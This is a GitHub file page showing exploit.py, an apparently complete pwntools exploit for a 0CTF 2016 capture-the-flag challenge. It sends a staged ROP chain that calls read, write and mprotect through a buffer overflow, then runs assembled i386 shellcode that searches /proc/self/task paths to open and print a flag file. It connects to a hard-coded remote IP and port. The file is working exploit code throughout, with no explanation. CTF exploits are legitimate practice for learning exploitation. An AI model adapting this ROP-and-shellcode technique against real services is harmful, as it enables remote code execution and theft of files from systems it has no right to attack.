-
Notifications
You must be signed in to change notification settings - Fork 263
/
Copy pathexploit.py
executable file
·82 lines (72 loc) · 3.21 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
#!/usr/bin/python2
from cStringIO import StringIO
from pwn import *
def attack(connection):
stage2_code = [
"begin:",
" mov ebp, 0x08049000",
shellcraft.i386.linux.syscall("SYS_alarm", 0),
"open:",
" lea ebx, [ebp + suffix - begin - 1]",
" jmp 1f",
"0:",
" mov byte ptr[ebx], 0x30",
" dec ebx",
" cmp byte ptr[ebx - 1], 0x39",
" jg failure",
"1:",
" inc byte ptr[ebx]",
" cmp byte ptr[ebx], 0x39",
" jg 0b",
" lea ebx, [ebp + pathname - begin]",
shellcraft.i386.linux.syscall("SYS_open", "ebx", constants.O_RDONLY),
" cmp eax, 0",
" jl open",
" lea ecx, [ebp + buffer - begin]",
shellcraft.i386.linux.syscall("SYS_read", "eax", "ecx", 0x100),
"failure:",
shellcraft.i386.linux.syscall("SYS_write", 1, "ebp", 0x200),
shellcraft.i386.linux.syscall("SYS_exit", 0),
"pathname:",
" .ascii \"/proc/self/task//////\"",
"suffix:",
" .asciz \"/root/home/sandbox/flag\"",
"buffer:",
]
stage2 = asm("\n".join(stage2_code), arch = "i386", os = "linux")
buffer = StringIO()
buffer.write(p32(0x0804811d)) # sys_read
buffer.write(p32(0x080481b8)) # add esp, 0x30 ; ret
buffer.write(p32(0)) # fd
buffer.write(p32(0x08049000)) # buffer
buffer.write(p32(len(stage2))) # size
buffer.write("A" * 0x24)
buffer.write(p32(0x08048135)) # sys_write
buffer.write(p32(0x080481b8)) # add esp, 0x30 ; ret
buffer.write(p32(1)) # fd
buffer.write(p32(0x08049000)) # buffer
buffer.write(p32(constants.linux.i386.SYS_mprotect)) # size
buffer.write("A" * 0x24)
buffer.write(p32(0x08048122)) # syscall
buffer.write(p32(0x08049000)) # stage2
buffer.write(p32(0x08049000)) # buffer
buffer.write(p32(len(stage2))) # size
buffer.write(p32(constants.linux.PROT_READ | constants.linux.PROT_WRITE | constants.linux.PROT_EXEC))
stage1 = buffer.getvalue()
for offset in reversed(range(4, len(stage1), 0x10)):
connection.recvuntil("Welcome to 0CTF 2016!\n")
buffer = StringIO()
buffer.write("A" * 0x20)
if offset == 4:
buffer.write(stage1[: offset + 0x10])
else:
buffer.write(p32(0x080480d8)) # start
buffer.write(stage1[offset: offset + 0x10])
padding = 0x34 - buffer.tell()
buffer.write("B" * padding)
connection.send(buffer.getvalue())
connection.send(stage2)
leak = connection.recvall()
print leak.encode("string_escape")
with remote("202.120.7.207", 52608) as connection:
attack(connection)